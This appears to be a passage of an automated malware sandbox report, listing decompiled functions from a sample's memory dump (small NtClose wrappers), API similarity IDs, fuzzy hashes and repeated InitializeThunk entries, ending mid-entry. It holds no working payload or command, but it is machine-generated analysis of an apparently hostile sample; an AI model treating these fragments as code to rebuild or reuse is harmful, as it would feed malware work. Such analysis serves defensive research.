                                                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                    • Instruction ID: 14db738f56e41aa2aafe601219d1644efa3144b60066d0a4b1a6baaee3c04518
                                                                                                                                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8F015B2200208ABCB14DF89CC81EEB77ADAF8C750F118148BE0897242C630F810CBE0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                    			E0009A06C(void* __eax, intOrPtr _a4, void* _a8) {
                                                                                                                                                                                    				long _t10;
                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                    
                                                                                                                                                                                    				asm("scasd");
                                                                                                                                                                                    				_t7 = _a4;
                                                                                                                                                                                    				_t2 = _t7 + 0x10; // 0x300
                                                                                                                                                                                    				_t3 = _t7 + 0xc50; // 0x8a923
                                                                                                                                                                                    				E0009AB40(_t13, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                                                                                    				_t10 = NtClose(_a8); // executed
                                                                                                                                                                                    				return _t10;
                                                                                                                                                                                    			}





                                                                                                                                                                                    0x0009a06c
                                                                                                                                                                                    0x0009a073
                                                                                                                                                                                    0x0009a076
                                                                                                                                                                                    0x0009a07f
                                                                                                                                                                                    0x0009a087
                                                                                                                                                                                    0x0009a095
                                                                                                                                                                                    0x0009a099

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtClose.NTDLL(00094D30,?,?,00094D30,00089CD3,FFFFFFFF), ref: 0009A095
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140345965.0000000000080000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140373133.000000000009E000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140377394.000000000009F000.00000020.00000001.sdmp Download File
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Close
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                                                                    • Opcode ID: d430dcef36f562bc3c0fb48e6ff32afccf0402f52ad9d9ab4a88587c1026ee4f
                                                                                                                                                                                    • Instruction ID: 722153eafe98917db96ef93b86fa33e4eafb2ef5fc09a96e89ee571c927ab21c
                                                                                                                                                                                    • Opcode Fuzzy Hash: d430dcef36f562bc3c0fb48e6ff32afccf0402f52ad9d9ab4a88587c1026ee4f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DE01276644110ABD710EFE4CC86FEBBBA9EF48350F158555B91CDB652C530E51186D0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                    			E0009A070(intOrPtr _a4, void* _a8) {
                                                                                                                                                                                    				long _t8;
                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t5 = _a4;
                                                                                                                                                                                    				_t2 = _t5 + 0x10; // 0x300
                                                                                                                                                                                    				_t3 = _t5 + 0xc50; // 0x8a923
                                                                                                                                                                                    				E0009AB40(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                                                                                    				_t8 = NtClose(_a8); // executed
                                                                                                                                                                                    				return _t8;
                                                                                                                                                                                    			}





                                                                                                                                                                                    0x0009a073
                                                                                                                                                                                    0x0009a076
                                                                                                                                                                                    0x0009a07f
                                                                                                                                                                                    0x0009a087
                                                                                                                                                                                    0x0009a095
                                                                                                                                                                                    0x0009a099

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtClose.NTDLL(00094D30,?,?,00094D30,00089CD3,FFFFFFFF), ref: 0009A095
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140345965.0000000000080000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140373133.000000000009E000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140377394.000000000009F000.00000020.00000001.sdmp Download File
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Close
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                    • Instruction ID: ce72d5ff7f25dd62d07ee14d3e0c5840044f878630da73b2de4a871958c19de0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50D01776200214ABDB10EB98CC85FE7BBADEF48760F154499BA189B243C630FA0086E0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                                                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                                                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                                                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                                                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                                                    • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
